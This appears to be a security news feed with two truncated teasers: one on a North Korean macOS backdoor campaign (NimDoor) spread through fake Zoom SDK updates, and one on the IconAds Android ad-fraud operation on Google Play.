Security researchers at SentinelOne have uncovered a sophisticated attack campaign involving North Korean threat actors—linked to the BlueNoroff/Lazarus APT group—targeting Web3 and cryptocurrency firms. The attackers are using fake Zoom SDK update scripts to trick macOS users into installing a rare Nim‑compiled backdoor dubbed NimDoor 🧠 The Social Engineering Setup Victims are contacted on Telegram by someone posing as a trusted peer and invited to schedule a meeting via Calendly. They then receive an email with a “Zoom meeting” link and instructions to run a Zoom SDK update. The script is heavily obfuscated , padded with thousands of blank lines to disguise its true purpose. 🛠 Infection Chain & Techniques AppleScript Downloader A malicious AppleScript triggers the download of a second-stage payload from a spoofed Zoom domain Dual‑Channel Loaders A C++ loader ( InjectWithDyldArm64 ) uses process injection on macOS to deploy trojan payloads like trojan1_arm64 that...
In early July 2025, cybersecurity experts at HUMAN's Satori Threat Intelligence team and others revealed a massive ad-fraud operation on Android— IconAds —comprising 352 malicious apps on Google Play. These apps cleverly hid themselves to generate 1.2 billion fraudulent ad bid requests per day at their peak 🔍 How IconAds Works Icon‑Hiding Stealth Tactics Uses Android's activity-alias feature to swap legitimate app icons with invisible placeholders—presenting blank or Google-branded icons—making detection nearly impossible Some variants impersonate Google Play, Google Maps, or Gmail, leading users to unknowingly open the malicious app Out-of-Context Full-Screen Ads Apps launch intrusive ads on user screens independently of user action—disrupting user experience while secretly monetizing ad impressions Layered Obfuscation Code is heavily obfuscated using tools like O-MVLL and native libraries. Network traffic masks OS version, device model, and language using r...